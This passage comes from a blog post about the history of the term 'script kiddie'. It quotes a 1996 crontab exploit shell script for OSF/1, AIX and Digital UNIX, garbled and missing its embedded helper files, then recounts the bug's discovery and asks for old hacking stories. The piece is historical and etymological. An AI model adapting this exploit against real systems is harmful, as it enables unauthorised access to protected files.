will place you in jail, then neither I, nor sirsyko, nor the other fine folks of r00t are responsible. Personally, I hope my script eats your cat and causes swarms of locuses to decend down upon you, but I am not responsible if they do. --kmem. [-- Script kiddies cut here -- ] #!/bin/sh # This bug was discovered by sirsyko Thu Mar 21 00:45:27 EST 1996 # This crappy exploit script was written by kmem. # and remember if ur not owned by r00t, ur not worth owning # # usage: crongrab echo Crontab exploit for OSF/1, AIX 3.2.5, Digital UNIX, others??? echo if this did not work on OSF/1 read the comments -- it is easy to fix. if [ $# -ne '2' ]; then echo "usage: $0 " exit fi HI_MUDGE=$1 YUMMY=$2 export HI_MUDGE UNAME=`uname` GIRLIES="1.awk aix.sed myedit.sh myedit.c .r00t-tmp1" #SETUP the awk script cat >1.awk <aix.sed <myedit.sh <.r00t-tmp1 sed -f aix.sed .r00t-tmp1 > $YUMMY elif [ $UNAME = "OSF1" ]; then #FOR DIGITAL UNIX 3.X or higher machines uncomment these 2 lines crontab -e 2>.r00t-tmp1 awk -f 1.awk .r00t-tmp1 >$YUMMY # FOR PRE DIGITAL UNIX 3.X machines uncomment this line #crontab -l 2>&1 > $YUMMY else echo "Sorry, dont know your OS. But you are a bright boy, read the skript and" echo "Figger it out." exit fi echo "Checkit out - $YUMMY" echo "sirsyko and kmem kickin it out." echo "r00t" #cleanup our mess crontab -r VISUAL=$oldvis EDITOR=$oldedit HI_MUDGE='' YUMMY='' export HI_MUDGE export YUMMY export VISUAL export EDITOR rm -f $GIRLIES [-- Script kiddies cut here -- ] THERE IT IS! This bug was discovered by sirsyko on Thursday 21st Mar of 1996, just after midnight. I guess nothing has changed with hacking into the night. And this exploit script was written by kmem. You know what’s cool? With a bit of digging I actually found party pictures from around 1996/97 from kmem and sirsyko. I’m so grateful that there was some record keeping through pictures from that time, which takes away some of the mysticism that surrounds those early hackers - they look like normal dudes! But anyway, is this really the first time that somebody used the term script kiddie? Is this where it all started? Well… When I was asking around, somebody reminded me of Cunningham's Law the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer. so... I DECLARE THIS EXPLOIT TO BE THE FIRST USAGE OF THE TERM SCRIPT KIDDIE! IT’S. A. FACT! Epilogue I’m aware that a lot of the hacking culture happened in private boards, forums and chat rooms. But maybe somebody out there has old (non-)public IRC logs and can grep over it for us. I think it would be really cool to find more traces about the evolution of this term. Also I would LOVE to hear the story behind any exploit from the 90s. How did you find it, did you share it, how did you learn what you knew, what kind of research did you do yourself, who was influential to you, did anybody steal your bug, were there bug collisions, what was it like to experience a buffer overflow for the first time, etc. I think there are a lot of fascinating stories hidden behind those zines and exploits from that time and they haven’t been told yet. I don’t want them to be forgotten - please share your story. Update I was just sent this talk by Alex Ivanov and @JohnDunlap2 from HOPE 2018. They saw my tweet from 2018 about the exploit in 1996, but they go even further! A lot of info about k-rad, the first 1337 speak, etc. LiveOverflow wannabe hacker... Sursa: https://liveoverflow.com/the-origin-of-script-kiddie-hacker-etymology/